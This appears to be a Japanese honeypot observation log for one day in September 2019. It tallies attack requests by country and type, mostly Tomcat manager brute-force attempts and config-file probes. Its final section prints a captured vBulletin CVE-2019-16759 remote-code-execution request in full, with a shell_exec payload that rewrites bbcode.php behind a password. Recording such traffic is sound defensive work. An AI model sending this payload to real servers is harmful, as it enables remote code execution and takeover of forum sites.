WOWHoneypot観察(194日目)
2019/09/26(木)
トータルは4111件でした。
ハンティングログはありませんでした。
IPのロケーション別の件数は以下です。
アルゼンチン | 4004 |
エストニア | 21 |
香港 | 20 |
ブラジル | 10 |
アメリカ | 9 |
中国 | 5 |
メキシコ | 4 |
ベトナム | 4 |
イラン | 3 |
イタリア | 3 |
イギリス | 3 |
トルコ | 3 |
オランダ | 2 |
フランス | 2 |
ルーマニア | 2 |
インド | 2 |
インドネシア | 2 |
タイ | 2 |
カザフスタン | 1 |
ロシア | 1 |
ブルガリア | 1 |
リトアニア | 1 |
フィリピン | 1 |
ドイツ | 1 |
モロッコ | 1 |
コロンビア | 1 |
ポーランド | 1 |
マレーシア | 1 |
件数 | 概要 | リクエスト |
---|---|---|
4003 | Tomcat管理ページに対するブルートフォース攻撃 | GET /manager/html |
71 | アクセス | GET / |
10 | 調査 | HEAD / |
5 | vBulletinのゼロデイを狙った通信 | POST /index.php?routestring=ajax/render/widget_php |
1 | cfgファイル調査 | GET /vcfg/0000000000000.cfg |
1 | cfgファイル調査 | GET /tftproot/0000000000000.cfg |
1 | cfgファイル調査 | GET /tftpboot/0000000000000.cfg |
1 | cfgファイル調査 | GET /provisioner/0000000000000.cfg |
1 | cfgファイル調査 | GET /pps/0000000000000.cfg |
1 | cfgファイル調査 | GET /phone/0000000000000.cfg |
1 | cfgファイル調査 | GET /pbx/0000000000000.cfg |
1 | cfgファイル調査 | GET /p/v2/config/0000000000000.cfg |
1 | cfgファイル調査 | GET /p/config/0000000000000.cfg |
1 | cfgファイル調査 | GET /p/0000000000000.cfg |
1 | cfgファイル調査 | GET /ipeconfig/0000000000000.cfg |
1 | cfgファイル調査 | GET /home/tftpboot/0000000000000.cfg |
1 | 不明 | GET /fjkasljfklasjlfjklasjklfjlasjkflsa/ |
1 | cfgファイル調査 | GET /files/0000000000000.cfg |
1 | cfgファイル調査 | GET /configs/0000000000000.cfg |
1 | cfgファイル調査 | GET /config/tftp/0000000000000.cfg |
1 | cfgファイル調査 | GET /config/sipphone/0000000000000.cfg |
1 | cfgファイル調査 | GET /cfgsip/0000000000000.cfg |
1 | cfgファイル調査 | GET /cfgs/0000000000000.cfg |
1 | cfgファイル調査 | GET /app/provision0000000000000.cfg |
1 | cfgファイル調査 | GET /app/0000000000000.cfg |
1 | cfgファイル調査 | GET /0000000000000.cfg |
vBulletin 5.x のRCEのゼロデイ(CVE-2019-16759)を狙った通信を観測していました。
POST /index.php?routestring=ajax/render/widget_php HTTP/1.1
Host: *.*.*.*
User-Agent: Mozilla/5.0 (Linux; Android 9; Redmi Note 5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Mobile Safari/537.36
Content-Length: 378
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzipwidgetConfig%5Bcode%5D=echo+shell_exec%28%27sed+-i+%5C%27s%2Feval%28%5C%24code%29%3B%2Fif+%28isset%28%5C%24_REQUEST%5B%5C%22epass%5C%22%5D%29+%5C%26%5C%26+%5C%24_REQUEST%5B%5C%22epass%5C%22%5D+%3D%3D+%5C%222dmfrb28nu3c6s9j%5C%22%29+%7B+eval%28%5C%24code%29%3B+%7D%2Fg%5C%27+includes%2Fvb5%2Ffrontend%2Fcontroller%2Fbbcode.php+%26%26+echo+-n+exploited+%7C+md5sum%27%29%3B+exit%3B
widgetConfig[code]=echo+shell_exec('sed+-i+\'s/eval(\$code);/if+(isset(\$_REQUEST[\"epass\"])+\&\&+\$_REQUEST[\"epass\"]+==+\"2dmfrb28nu3c6s9j\")+{+eval(\$code);+}/g\'+includes/vb5/frontend/controller/bbcode.php+&&+echo+-n+exploited+|+md5sum');+exit;